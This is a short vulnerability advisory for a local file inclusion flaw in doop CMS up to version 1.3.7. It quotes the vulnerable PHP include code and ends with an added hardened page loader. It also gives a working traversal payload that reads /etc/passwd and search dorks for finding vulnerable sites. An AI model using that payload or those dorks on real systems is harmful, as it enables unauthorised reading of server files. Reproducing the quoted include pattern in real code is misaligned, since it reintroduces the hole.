
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability

Author: vladii
Risk: Security Risk Unsorted
0day-ID: 0day-ID-2227
Category: web applications
Date added: 14-10-2007
Platform: unsorted
===========================================================
doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability
===========================================================



 ______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |
| works only if magic_quotes_gpc is set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|
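
A hardened form of the page loader quoted above, as an added example that is not doop CMS code or the advisory author's: the requested name must match a strict slug pattern, and the resolved path must stay under pages/. PAGES_DIR, resolve_page(), the 'home' default and the assumption that pages are static HTML (so readfile() can replace include) are hypothetical.

```php
<?php
// Added example, not doop CMS code. PAGES_DIR and resolve_page() are hypothetical names.
const PAGES_DIR = __DIR__ . '/pages';

/**
 * Map a user-supplied page name to a file inside PAGES_DIR.
 * Returns the absolute path, or null if the name is invalid or the file is missing.
 */
function resolve_page(string $requested): ?string
{
    // Allow only a plain slug: no slashes, dots, NUL bytes or empty names.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }
    $base = realpath(PAGES_DIR);
    if ($base === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    // Same extension order as the original code: .htm first, then .html.
    foreach (['.htm', '.html'] as $ext) {
        // realpath() collapses ../ sequences and symlinks before the containment check.
        $real = realpath($prefix . $requested . $ext);
        if ($real !== false && is_file($real)
            && strncmp($real, $prefix, strlen($prefix)) === 0) {
            return $real;
        }
    }
    return null;
}

// Read from $_GET only (not $_REQUEST) and require a string, not an array.
$homepage = 'home'; // assumed default page name
$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : $homepage;

$file = resolve_page($page);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');
}
// Assumption: pages are static HTML, so send them as data instead of include().
readfile($file);
```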


